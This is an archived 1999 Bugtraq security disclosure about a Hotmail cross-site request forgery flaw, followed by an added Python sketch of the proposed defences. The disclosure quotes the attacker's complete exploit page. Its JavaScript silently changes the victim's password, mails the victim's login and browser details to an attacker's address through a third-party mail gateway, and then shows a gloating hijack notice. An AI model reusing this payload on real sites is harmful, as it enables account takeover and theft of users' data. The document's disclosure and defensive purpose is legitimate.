hotmail.browser.trust.txt

1999-08-17T00:00:00
ID PACKETSTORM:11905
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

Date: Wed, 5 May 1999 17:31:34 -0500  
From: David L. Nicol <david@KASEY.UMKC.EDU>  
To: BUGTRAQ@netspace.org  
Subject: hotmail claims vulnerability patched, so here it is  
  
Dear Paul:  
  
I am reading your previous article on hotmail security,  
http://www.news.com/News/Item/0,4,33996,00.html  
  
and I'm CCing this message to the bugtraq list.  
  
A good patch from Hotmail would have to involve some additional  
info with the cookie.  
  
A couple of approaches that come to mind include:  
  
verifying http_referer data in the script submission to make sure it's  
from the expected hotmail page  
  
putting additional hidden key fields with constantly changing names  
and values on submittable pages, to provide verification that the pages  
are legit  
  
investigating any incidents of pages being submitted with incorrect,  
nonexistent, or unexpected "secret flag fields" as described above  
  
I don't work for hotmail (as you know) and I am caught up in this  
as a bystander;  
  
I would expect hotmail to give you an explanation of their patch that not  
only is detailed but makes sense and that you cannot find a hole in.  
  
If hotmail merely changed the names of variables, or did a similar  
short term fix, the next exploit might not be nice enough to announce  
itself as such. Modifying the attached El Lite exploit to only work  
if it had a particular hotmail account might be a piece of cake,  
allowing for some highly targeted kinds of attacks. (esp. if a hotmail user is  
doing anything involving return-email verification, like tipjar or first  
virtual.)  
  
  
  
Here is the hacker's tripod page, including the exploit that  
takes advantage of the trust hotmail has for instructions from  
your browser, by secretly sending instructions to hotmail to change  
your password to  
  
  
  
<HTML>  
<kraffa2="<HEAD>  
<!--Begin JavaScrypt roadmap code. If editing downloaded HTML source,  
delete  
this portion.-->  
  
<scrypt language="JavaScrypt">  
  
  
<!--  
  
function TripodShowPopup()  
{  
// open the popup window  
var popupURL =  
"http://members.tripod.com/adm/popup/roadmap.shtml";  
var popup =  
window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,heig  
ht=105');  
// set the opener if it's not already set. it's set  
automatically  
// in netscape 3.0+ and ie 3.0+.  
if( navigator.appName.substring(0,8) == "Netscape" )  
{  
popup.location = popupURL;  
}  
}  
  
TripodShowPopup();  
  
// -->  
  
  
</scrypt>  
  
<!--End inserted JavaScript code.-->  
<base href="http://members.tripod.com/kraffa2/Hook.html">  
</HEAD>  
  
<body>  
<scrypt>  
<!--  
  
function getCGIValue(nombre, elURL)  
{  
elURL= elURL;  
nombre= nombre+"=";  
vacio="";  
found= elURL.indexOf(nombre);  
if (found > -1)  
{  
found2= elURL.indexOf("&",found);  
found+= nombre.length;  
end= (found2 > -1) ? found2 : elURL.length;  
var value= elURL.substring(found, end);  
value= (value != null) ? value : vacio;  
return value;  
  
}  
else {return vacio;}  
  
}  
  
Query= unescape(self.location.search);  
disk= getCGIValue("disk", Query);  
login= getCGIValue("login", Query);  
host= "www.hotmail.com";  
hintq= escape('<img  
src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El  
Lite©</center>');  
hinta= '%66axf%61x';  
TheURL=  
"http://  
"+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A  
01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;  
Mail=  
"http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom=  
"+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");  
  
options=  
'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';  
  
HOTMAIL= window.open(TheURL,"HOTMAIL",options);  
self.focus();  
setTimeout("HOTMAIL.close()",8000);  
  
MAIL= window.open(Mail,"MAIL",options);  
self.focus();  
setTimeout("MAIL.close()",8000);  
  
  
  
//-->  
</scrypt>  
  
  
  
<pre><b>  
  
One of the best free mail services in existence is precisely the one  
you are using, hotmail. Its security and inviolability are already  
legendary.  
  
So much so that, look, from this very moment things are going to take  
a different turn. I mean that, regrettably, your hotmail address has  
been disabled, or rather, hijacked by me.  
  
You will never be able to get into it again.  
  
That's final. Now it is  
  
MINE ALOOONE!!!! :-))))  
  
Since I am a good guy and you are not my only victim, one of these days  
I am going to post on es.comp.hackers the password I set for you (it is  
the same for all of you suckers)  
  
There you go, take it easy  
  
El Lite©  
</b></pre>  
</body>  
</html>  
  
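The three defences proposed in the message above (a Referer check against the expected host, a hidden field whose name and value change on every rendered page, and flagging submissions that arrive without a valid field) as an added Python sketch; this is not part of the original post or of Hotmail's code, and `FormGuard`, the session ids, the server secret and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Host the password-change form is expected to be submitted from (taken from the post).
EXPECTED_HOST = "www.hotmail.com"


class FormGuard:
    """Per-session, one-time anti-forgery tokens whose field names also change per page."""

    def __init__(self, server_secret):
        self.secret = server_secret          # constructed server-side secret, never sent to the browser
        self.issued = {}                     # session_id -> {field_name: field_value} still valid
        self.audit = []                      # (session_id, verdict, referer) for the "investigate" step

    def issue(self, session_id, form):
        """Called when a submittable page is rendered: returns the hidden field to embed."""
        nonce = secrets.token_hex(8)
        mac = hmac.new(self.secret, f"{session_id}|{form}|{nonce}".encode(), hashlib.sha256).hexdigest()
        name, value = "f" + mac[:12], mac[12:]   # unpredictable name AND value, fresh per page
        self.issued.setdefault(session_id, {})[name] = value
        return name, value

    def check(self, session_id, fields, referer):
        """Called on submission; returns a verdict and records anything that is not 'ok'."""
        verdict = self._verdict(session_id, fields, referer)
        if verdict != "ok":
            self.audit.append((session_id, verdict, referer))
        return verdict

    def _verdict(self, session_id, fields, referer):
        # Approach 1: the submission must come from the expected page (a missing Referer fails too).
        host = urlparse(referer).hostname if referer else None
        if host != EXPECTED_HOST:
            return "bad_referer"
        # Approach 2: exactly one outstanding secret field must be present with the right value.
        expected = self.issued.get(session_id, {})
        present = [n for n in fields if n in expected]
        if not present:
            return "missing_token"           # e.g. a URL built by a foreign page, as in the exploit
        name = present[0]
        if not hmac.compare_digest(fields[name], expected[name]):
            return "bad_token"
        del expected[name]                   # one-time use: a replay of the same URL is rejected
        return "ok"
```

A request shaped like the attached exploit (no secret field, Referer on another host) is classified as `bad_referer`, and the `audit` list is what approach 3 in the message would have an operator review.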